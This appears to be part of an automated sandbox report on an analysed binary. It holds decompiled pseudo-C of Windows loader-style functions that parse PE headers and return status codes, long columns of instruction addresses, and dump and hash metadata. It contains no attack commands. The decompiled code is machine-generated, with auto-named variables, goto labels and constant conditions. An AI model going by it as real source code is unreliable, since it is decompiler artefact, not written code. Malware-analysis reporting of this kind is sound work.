									if((_t206 |  *0x4bab2fc) == 0 || ( *0x4bab2e4 & 0x00000001) != 0) {
										goto L46;
									} else {
										_t297 =  *0x4bab2ec; // 0x100
										_v200 = 0;
										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
											_t355 = _v168;
											_t342 =  &_v208;
											_t208 = E04B66B68(_v168,  &_v208, _v168, __eflags);
											__eflags = _t208 - 1;
											if(_t208 == 1) {
												goto L46;
											} else {
												__eflags = _v208 & 0x00000010;
												if((_v208 & 0x00000010) == 0) {
													goto L46;
												} else {
													_t342 = 4;
													_t366 = E04B66AEB(_t355, 4,  &_v216);
													__eflags = _t366;
													if(_t366 >= 0) {
														goto L46;
													} else {
														asm("int 0x29");
														_t356 = 0;
														_v44 = 0;
														_t290 = _v52;
														__eflags = 0;
														if(0 == 0) {
															L108:
															_t356 = 0;
															_v44 = 0;
															goto L63;
														} else {
															__eflags = 0;
															if(0 < 0) {
																goto L108;
															}
															L63:
															_v112 = _t356;
															__eflags = _t356;
															if(_t356 == 0) {
																L143:
																_v8 = 0xfffffffe;
																_t211 = 0xc0000089;
															} else {
																_v36 = 0;
																_v60 = 0;
																_v48 = 0;
																_v68 = 0;
																_v44 = _t290 & 0xfffffffc;
																E04ACE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
																_t306 = _v68;
																__eflags = _t306;
																if(_t306 == 0) {
																	_t216 = 0xc000007b;
																	_v36 = 0xc000007b;
																	_t307 = _v60;
																} else {
																	__eflags = _t290 & 0x00000001;
																	if(__eflags == 0) {
																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
																		__eflags = _t349 - 0x10b;
																		if(_t349 != 0x10b) {
																			__eflags = _t349 - 0x20b;
																			if(_t349 == 0x20b) {
																				goto L102;
																			} else {
																				_t307 = 0;
																				_v48 = 0;
																				_t216 = 0xc000007b;
																				_v36 = 0xc000007b;
																				goto L71;
																			}
																		} else {
																			L102:
																			_t307 =  *(_t306 + 0x50);
																			goto L69;
																		}
																		goto L151;
																	} else {
																		_t239 = L04ACEAEA(_t290, _t290, _t356, _t366, __eflags);
																		_t307 = _t239;
																		_v60 = _t307;
																		_v48 = _t307;
																		__eflags = _t307;
																		if(_t307 != 0) {
																			L70:
																			_t216 = _v36;
																		} else {
																			_push(_t239);
																			_push(0x14);
																			_push( &_v144);
																			_push(3);
																			_push(_v44);
																			_push(0xffffffff);
																			_t319 = E04AF9730();
																			_v36 = _t319;
																			__eflags = _t319;
																			if(_t319 < 0) {
																				_t216 = 0xc000001f;
																				_v36 = 0xc000001f;
																				_t307 = _v60;
																			} else {
																				_t307 = _v132;
																				L69:
																				_v48 = _t307;
																				goto L70;
																			}
																		}
																	}
																}
																L71:
																_v72 = _t307;
																_v84 = _t216;
																__eflags = _t216 - 0xc000007b;
																if(_t216 == 0xc000007b) {
																	L150:
																	_v8 = 0xfffffffe;
																	_t211 = 0xc000007b;
																} else {
																	_t344 = _t290 & 0xfffffffc;
																	_v76 = _t344;
																	__eflags = _v40 - _t344;
																	if(_v40 <= _t344) {
																		goto L150;
																	} else {
																		__eflags = _t307;
																		if(_t307 == 0) {
																			L75:
																			_t217 = 0;
																			_v104 = 0;
																			__eflags = _t366;
																			if(_t366 != 0) {
																				__eflags = _t290 & 0x00000001;
																				if((_t290 & 0x00000001) != 0) {
																					_t217 = 1;
																					_v104 = 1;
																				}
																				_t290 = _v44;
																				_v52 = _t290;
																			}
																			__eflags = _t217 - 1;
																			if(_t217 != 1) {
																				_t369 = 0;
																				_t218 = _v40;
																				goto L91;
																			} else {
																				_v64 = 0;
																				E04ACE9C0(1, _t290, 0, 0,  &_v64);
																				_t309 = _v64;
																				_v108 = _t309;
																				__eflags = _t309;
																				if(_t309 == 0) {
																					goto L143;
																				} else {
																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
																					__eflags = _t226 - 0x10b;
																					if(_t226 != 0x10b) {
																						__eflags = _t226 - 0x20b;
																						if(_t226 != 0x20b) {
																							goto L143;
																						} else {
																							_t371 =  *(_t309 + 0x98);
																							goto L83;
																						}
																					} else {
																						_t371 =  *(_t309 + 0x88);
																						L83:
																						__eflags = _t371;
																						if(_t371 != 0) {
																							_v80 = _t371 - _t356 + _t290;
																							_t310 = _v64;
																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
																							_t292 =  *(_t310 + 6) & 0x0000ffff;
																							_t311 = 0;
																							__eflags = 0;
																							while(1) {
																								_v120 = _t311;
																								_v116 = _t348;
																								__eflags = _t311 - _t292;
																								if(_t311 >= _t292) {
																									goto L143;
																								}
																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
																								__eflags = _t371 - _t359;
																								if(_t371 < _t359) {
																									L98:
																									_t348 = _t348 + 0x28;
																									_t311 = _t311 + 1;
																									continue;
																								} else {
																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
																										goto L98;
																									} else {
																										__eflags = _t348;
																										if(_t348 == 0) {
																											goto L143;
																										} else {
																											_t218 = _v40;
																											_t312 =  *_t218;
																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
																												_v100 = _t359;
																												_t360 = _v108;
																												_t372 = L04AC8F44(_v108, _t312);
																												__eflags = _t372;
																												if(_t372 == 0) {
																													goto L143;
																												} else {
																													_t290 = _v52;
																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04AF3C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
																													_t307 = _v72;
																													_t344 = _v76;
																													_t218 = _v40;
																													goto L91;
																												}
																											} else {
																												_t290 = _v52;
																												_t307 = _v72;
																												_t344 = _v76;
																												_t369 = _v80;
																												L91:
																												_t358 = _a4;
																												__eflags = _t358;
																												if(_t358 == 0) {
																													L95:
																													_t308 = _a8;
																													__eflags = _t308;
																													if(_t308 != 0) {
																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
																													}
																													_v8 = 0xfffffffe;
																													_t211 = _v84;
																												} else {
																													_t370 =  *_t218 - _t369 + _t290;
																													 *_t358 = _t370;
																													__eflags = _t370 - _t344;
																													if(_t370 <= _t344) {
																														L149:
																														 *_t358 = 0;
																														goto L150;
																													} else {
																														__eflags = _t307;
																														if(_t307 == 0) {
																															goto L95;
																														} else {
																															__eflags = _t370 - _t344 + _t307;
																															if(_t370 >= _t344 + _t307) {
																																goto L149;
																															} else {
																																goto L95;
																															}
																														}
																													}
																												}
																											}
																										}
																									}
																								}
																								goto L97;
																							}
																						}
																						goto L143;
																					}
																				}
																			}
																		} else {
																			__eflags = _v40 - _t307 + _t344;
																			if(_v40 >= _t307 + _t344) {
																				goto L150;
																			} else {
																				goto L75;
																			}
																		}
																	}
																}
															}
															L97:
															 *[fs:0x0] = _v20;
															return _t211;
														}
													}
												}
											}
										} else {
											goto L46;
										}
									}
								}
								goto L151;
							}
							_t288 = _v164;
							_t366 = 0xc0000135;
							goto L41;
						}
					}
				}
				L151:
			}

0x04acd5f2
0x04acd5f5
0x04acd5f5
0x04acd5fd
0x04acd600
0x04acd60a
0x04acd60d
0x04acd617
0x04acd61d
0x04acd627
0x04acd62e
0x04acd911
0x04acd913
0x00000000
0x04acd919
0x04acd919
0x04acd919
0x04acd634
0x04acd634
0x04acd634
0x04acd634
0x04acd640
0x04acd8bf
0x00000000
0x04acd646
0x04acd646
0x04acd64d
0x04acd652
0x04b1b2fc
0x04b1b2fc
0x04b1b302
0x04b1b33b
0x04b1b341
0x00000000
0x04b1b304
0x04b1b304
0x04b1b319
0x04b1b31e
0x04b1b324
0x04b1b326
0x04b1b332
0x04b1b347
0x04b1b34c
0x04b1b351
0x04b1b35a
0x00000000
0x04b1b328
0x04b1b328
0x00000000
0x04b1b328
0x04b1b326
0x04acd658
0x04acd658
0x04acd65b
0x04acd665
0x00000000
0x04acd66b
0x04acd66b
0x04acd66b
0x04acd66b
0x04acd66d
0x04acd672
0x04acd67a
0x00000000
0x00000000
0x04acd680
0x04acd686
0x04acd8ce
0x04acd8d4
0x04acd8da
0x04acd8dd
0x04acd8dd
0x04acd8e0
0x04acd68c
0x04acd691
0x04acd69d
0x04acd6a2
0x04acd6a7
0x04acd6b0
0x04acd6b0
0x04acd6b5
0x04acd6e0
0x04acd6b7
0x04acd6b7
0x04acd6b9
0x04acd6b9
0x04acd6bb
0x04acd6bd
0x04acd6ce
0x04acd6d0
0x04acd6d2
0x04b1b363
0x04b1b365
0x00000000
0x04b1b36b
0x00000000
0x04b1b36b
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x04acd6bf
0x04acd6bf
0x04acd6e5
0x04acd6e7
0x04acd6e9
0x04acd6e9
0x04acd6ec
0x04acd6ec
0x04acd6ef
0x04acd6f5
0x04acd6f9
0x04acd6fb
0x04acd6fd
0x04acd701
0x04acd703
0x04acd70a
0x04acd70a
0x04acd70a
0x04acd701
0x04acd70d
0x04acd710
0x04acd710
0x04acd6c1
0x04acd6c1
0x04acd6c1
0x04acd6c6
0x04b1b36d
0x04b1b36f
0x00000000
0x04b1b375
0x04b1b375
0x04b1b375
0x00000000
0x04b1b375
0x00000000
0x04acd6cc
0x04acd6d8
0x04acd6d8
0x04acd6d8
0x00000000
0x04acd6c6
0x04acd6bf
0x00000000
0x04acd6da
0x04acd6da
0x04acd716
0x04acd71b
0x04acd720
0x04acd726
0x04acd726
0x04acd72d
0x00000000
0x04acd733
0x04acd739
0x04acd742
0x04acd750
0x04acd758
0x04acd764
0x04acd776
0x04acd77a
0x04acd783
0x04acd928
0x04acd92c
0x04acd93d
0x04acd944
0x04acd94f
0x04acd954
0x04acd956
0x04acd95f
0x04acd961
0x04acd973
0x04acd973
0x04acd956
0x04acd944
0x04acd92c
0x04acd78b
0x04b1b394
0x04acd791
0x04acd798
0x04b1b3a3
0x04b1b3bb
0x04b1b3bb
0x04acd7a5
0x04acd866
0x04acd870
0x04acd884
0x04acd892
0x04acd898
0x04acd89e
0x04acd8a0
0x04acd8a6
0x04acd8ac
0x04acd8ae
0x04acd8b4
0x04acd8b4
0x04acd8ae
0x04acd7a5
0x04acd78b
0x04acd7b1
0x04b1b3c5
0x04b1b3c5
0x04acd7c3
0x04acd7ca
0x04acd7e5
0x04acd7eb
0x04acd8eb
0x04acd8ed
0x00000000
0x04acd8f3
0x04acd8f3
0x04acd8f3
0x00000000
0x04acd8ed
0x04acd7cc
0x04acd7cc
0x04acd7d2
0x00000000
0x04acd7d4
0x04acd7d4
0x04acd7d7
0x04acd7df
0x04b1b3d4
0x04b1b3d9
0x04b1b3dc
0x04b1b3dc
0x04b1b3df
0x04b1b3e2
0x04b1b468
0x04b1b46d
0x04b1b46f
0x04b1b46f
0x04b1b475
0x04acd8f8
0x04acd8f9
0x04acd8fd
0x04b1b3e8
0x04b1b3e8
0x04b1b3eb
0x04b1b3ed
0x00000000
0x04b1b3ef
0x04b1b3ef
0x04b1b3f1
0x04b1b3f4
0x04b1b3fe
0x04b1b404
0x04b1b409
0x04b1b40e
0x04b1b410
0x04b1b410
0x04b1b414
0x04b1b414
0x04b1b41b
0x04b1b420
0x04b1b423
0x04b1b425
0x04b1b427
0x04b1b42a
0x04b1b42d
0x04b1b42d
0x04b1b42a
0x04b1b432
0x04b1b436
0x04b1b438
0x04b1b43b
0x04b1b43b
0x04b1b449
0x04b1b44e
0x04b1b454
0x04b1b458
0x04b1b458
0x04b1b45d
0x00000000
0x04b1b45d
0x04b1b3ed
0x00000000
0x00000000
0x00000000
0x04acd7df
0x04acd7d2
0x04acd7ca
0x04b1b37c
0x04b1b37e
0x04b1b385
0x04b1b38a
0x00000000
0x04b1b38a
0x04acd742
0x04acd7f1
0x04acd7f8
0x04b1b49b
0x04b1b49b
0x04acd800
0x04acd837
0x04acd843
0x04acd845
0x04acd847
0x04acd84a
0x04acd84b
0x04acd84e
0x04acd857
0x04acd802
0x04acd802
0x04acd80d
0x00000000
0x04acd818
0x04acd818
0x04acd824
0x04acd831
0x04b1b4a5
0x04b1b4ab
0x04b1b4b3
0x04b1b4b8
0x04b1b4bb
0x00000000
0x04b1b4c1
0x04b1b4c1
0x04b1b4c8
0x00000000
0x04b1b4ce
0x04b1b4d4
0x04b1b4e1
0x04b1b4e3
0x04b1b4e5
0x00000000
0x04b1b4eb
0x04b1b4f0
0x04b1b4f2
0x04acdac9
0x04acdacc
0x04acdacf
0x04acdad1
0x04acdd78
0x04acdd78
0x04acdcf2
0x00000000
0x04acdad7
0x04acdad9
0x04acdadb
0x00000000
0x00000000
0x04acdae1
0x04acdae1
0x04acdae4
0x04acdae6
0x04b1b4f9
0x04b1b4f9
0x04b1b500
0x04acdaec
0x04acdaec
0x04acdaf5
0x04acdaf8
0x04acdafb
0x04acdb03
0x04acdb11
0x04acdb16
0x04acdb19
0x04acdb1b
0x04b1b52c
0x04b1b531
0x04b1b534
0x04acdb21
0x04acdb21
0x04acdb24
0x04acdcd9
0x04acdce2
0x04acdce5
0x04acdd6a
0x04acdd6d
0x00000000
0x04acdd73
0x04b1b51a
0x04b1b51c
0x04b1b51f
0x04b1b524
0x00000000
0x04b1b524
0x04acdce7
0x04acdce7
0x04acdce7
0x00000000
0x04acdce7
0x00000000
0x04acdb2a
0x04acdb2c
0x04acdb31
0x04acdb33
0x04acdb36
0x04acdb39
0x04acdb3b
0x04acdb66
0x04acdb66
0x04acdb3d
0x04acdb3d
0x04acdb3e
0x04acdb46
0x04acdb47
0x04acdb49
0x04acdb4c
0x04acdb53
0x04acdb55
0x04acdb58
0x04acdb5a
0x04b1b50a
0x04b1b50f
0x04b1b512
0x04acdb60
0x04acdb60
0x04acdb63
0x04acdb63
0x00000000
0x04acdb63
0x04acdb5a
0x04acdb3b
0x04acdb24
0x04acdb69
0x04acdb69
0x04acdb6c
0x04acdb6f
0x04acdb74
0x04b1b557
0x04b1b557
0x04b1b55e
0x04acdb7a
0x04acdb7c
0x04acdb7f
0x04acdb82
0x04acdb85
0x00000000
0x04acdb8b
0x04acdb8b
0x04acdb8d
0x04acdb9b
0x04acdb9b
0x04acdb9d
0x04acdba0
0x04acdba2
0x04acdba4
0x04acdba7
0x04acdba9
0x04acdbae
0x04acdbae
0x04acdbb1
0x04acdbb4
0x04acdbb4
0x04acdbb7
0x04acdbba
0x04acdcd2
0x04acdcd4
0x00000000
0x04acdbc0
0x04acdbc0
0x04acdbd2
0x04acdbd7
0x04acdbda
0x04acdbdd
0x04acdbdf
0x00000000
0x04acdbe5
0x04acdbe5
0x04acdbee
0x04acdbf1
0x04b1b541
0x04b1b544
0x00000000
0x04b1b546
0x04b1b546
0x00000000
0x04b1b546
0x04acdbf7
0x04acdbf7
0x04acdbfd
0x04acdbfd
0x04acdbff
0x04acdc0b
0x04acdc15
0x04acdc1b
0x04acdc1d
0x04acdc21
0x04acdc21
0x04acdc23
0x04acdc23
0x04acdc26
0x04acdc29
0x04acdc2b
0x00000000
0x00000000
0x04acdc31
0x04acdc34
0x04acdc36
0x04acdcbf
0x04acdcbf
0x04acdcc2
0x00000000
0x04acdc3c
0x04acdc41
0x04acdc43
0x00000000
0x04acdc45
0x04acdc45
0x04acdc47
0x00000000
0x04acdc4d
0x04acdc4d
0x04acdc50
0x04acdc52
0x04acdc55
0x04acdcfa
0x04acdcfe
0x04acdd08
0x04acdd0a
0x04acdd0c
0x00000000
0x04acdd12
0x04acdd15
0x04acdd2d
0x04acdd2f
0x04acdd32
0x04acdd35
0x00000000
0x04acdd35
0x04acdc5b
0x04acdc5b
0x04acdc5e
0x04acdc61
0x04acdc64
0x04acdc67
0x04acdc67
0x04acdc6a
0x04acdc6c
0x04acdc8e
0x04acdc8e
0x04acdc91
0x04acdc93
0x04acdcce
0x04acdcce
0x04acdc95
0x04acdc9c
0x04acdc6e
0x04acdc72
0x04acdc75
0x04acdc77
0x04acdc79
0x04b1b551
0x04b1b551
0x00000000
0x04acdc7f
0x04acdc7f
0x04acdc81
0x00000000
0x04acdc83
0x04acdc86
0x04acdc88
0x00000000
0x00000000
0x00000000
0x00000000
0x04acdc88
0x04acdc81
0x04acdc79
0x04acdc6c
0x04acdc55
0x04acdc47
0x04acdc43
0x00000000
0x04acdc36
0x04acdc23
0x00000000
0x04acdbff
0x04acdbf1
0x04acdbdf
0x04acdb8f
0x04acdb92
0x04acdb95
0x00000000
0x00000000
0x00000000
0x00000000
0x04acdb95
0x04acdb8d
0x04acdb85
0x04acdb74
0x04acdc9f
0x04acdca2
0x04acdcb0
0x04acdcb0
0x04acdad1
0x04b1b4e5
0x04b1b4c8
0x00000000
0x00000000
0x00000000
0x04acd831
0x04acd80d
0x00000000
0x04acd800
0x04b1b47f
0x04b1b485
0x00000000
0x04b1b485
0x04acd665
0x04acd652
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 82ddbe89038819b0329712068db020340a64fe16675ea31bbc91d211fed980a8
Instruction ID: 7f60b9ab31fc99c3d0ccab2a6e84be67315af67f9e0268c5c9a6793655659e74
Opcode Fuzzy Hash: 82ddbe89038819b0329712068db020340a64fe16675ea31bbc91d211fed980a8
Instruction Fuzzy Hash: BFE1AE71A043598FEB64DF28C980BA9B7B2FF45308F0441EED909AB290DB34BD95CB51

Uniqueness

Uniqueness Score: -1.00%

Function 04AC849B, Relevance: .3, Instructions: 290
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E04AC849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x4b8f9c0);
				E04B0D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x4ba7b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E04ACCEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E04AD2280( *[fs:0x30], 0x4ba8550);
						_t139 =  *0x4ba7b04; // 0x1
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E04AEF3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E04ACFFB0(_t193, _t235, 0x4ba8550);
								L5:
								return E04B0D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E04AB1C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x4ba7b9c; // 0x0
							_t235 = L04AD4620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x4ba7b10; // 0x10
								 *(_t237 - 0x4c) = _t150;
								_push(_t237 - 0x74);
								_push(_t237 - 0x39);
								_push(_t237 - 0x58);
								_t193 = E04AEA61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E04ACFFB0(_t193, _t235, 0x4ba8550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L04AD77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L04AD77F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x4ba7b04; // 0x1
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x4ba7b10; // 0x10
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E04AF37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x4ba7b9c; // 0x0
									_t214 = L04AD4620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E04AF37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x4ba7b10 =  *0x4ba7b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x4ba7b04 =  *0x4ba7b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L04AD77F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L04AD77F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x4ba7b08 =  *0x4ba7b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E04AF57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E04AFF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L04AD77F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E04AEA44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L04AD77F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E04AF96C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

0x04ac849b
0x04ac849b
0x04ac849b
0x04ac849b
0x04ac849d
0x04ac84a2
0x04ac84a7
0x04ac84b1
0x04ac84d8
0x00000000
0x04ac84b3
0x04ac84c4
0x04ac84c9
0x04ac84cd
0x04ac84cf
0x04ac84cf
0x04ac84d6
0x04ac84e6
0x04ac84e9
0x04ac84ec
0x04ac84ef
0x04ac84f2
0x04ac84f4
0x04ac84fc
0x04ac8501
0x04ac8506
0x04ac8509
0x04ac86e0
0x04ac86e5
0x04ac86e8
0x04ac86ed
0x04ac86f0
0x04ac86f2
0x04b19afd
0x04b19b02
0x04ac84da
0x04ac84df
0x04ac84df
0x04ac86fa
0x04ac86fd
0x04ac86fe
0x04ac8701
0x04ac8706
0x04ac8709
0x04ac870b
0x00000000
0x00000000
0x04ac8711
0x04ac8725
0x04ac8727
0x04ac872a
0x04ac872c
0x04b19af0
0x04b19af5
0x04ac8732
0x04ac8732
0x04ac8732
0x04ac8735
0x04ac8737
0x04ac8515
0x04ac8515
0x04ac8518
0x04ac851d
0x04ac8523
0x04ac8527
0x04ac852b
0x04ac8537
0x04ac8539
0x04ac853c
0x04ac853e
0x04ac868c
0x04ac8691
0x04ac8699
0x04ac869b
0x04ac8744
0x04ac8748
0x04ac86a1
0x04ac86a1
0x04ac86a1
0x04ac86a4
0x04ac86a8
0x04b19bdf
0x04b19bdf
0x04ac86ae
0x04ac86b0
0x00000000
0x04ac86b6
0x00000000
0x04b19be9
0x04ac86b0
0x04ac8544
0x04ac854a
0x04ac854d
0x04ac8551
0x04ac876e
0x04ac8778
0x04ac877b
0x04ac8780
0x04ac8557
0x04ac8557
0x04ac855d
0x04ac855d
0x04ac856b
0x04ac856e
0x04ac8570
0x04ac8573
0x04ac8576
0x04ac8576
0x04ac8579
0x04ac857b
0x00000000
0x00000000
0x04ac8581
0x04ac85a0
0x04ac85a2
0x04ac85a5
0x04ac85a7
0x04b19b1b
0x04b19b1b
0x04ac862e
0x04ac862e
0x04ac8631
0x04ac8631
0x04ac8634
0x04ac8636
0x04ac8669
0x04ac8669
0x04ac866b
0x04b19bbf
0x04b19bc4
0x04b19bc8
0x04b19bce
0x04b19bce
0x04ac8671
0x04ac8671
0x04ac8674
0x04ac8676
0x04b19bae
0x04b19bae
0x04ac8676
0x04ac867c
0x04ac867e
0x04ac8688
0x04ac8688
0x00000000
0x04ac867e
0x04ac8638
0x04ac8638
0x04ac863b
0x04ac863e
0x04ac863f
0x04ac8642
0x04ac8645
0x04ac8648
0x04ac864d
0x04b19b69
0x04b19b6e
0x04b19b7b
0x04b19b81
0x04b19b85
0x04b19b89
0x04b19ba7
0x04b19b8b
0x04b19b91
0x04b19b9a
0x04b19b9f
0x04b19b9f
0x04ac8788
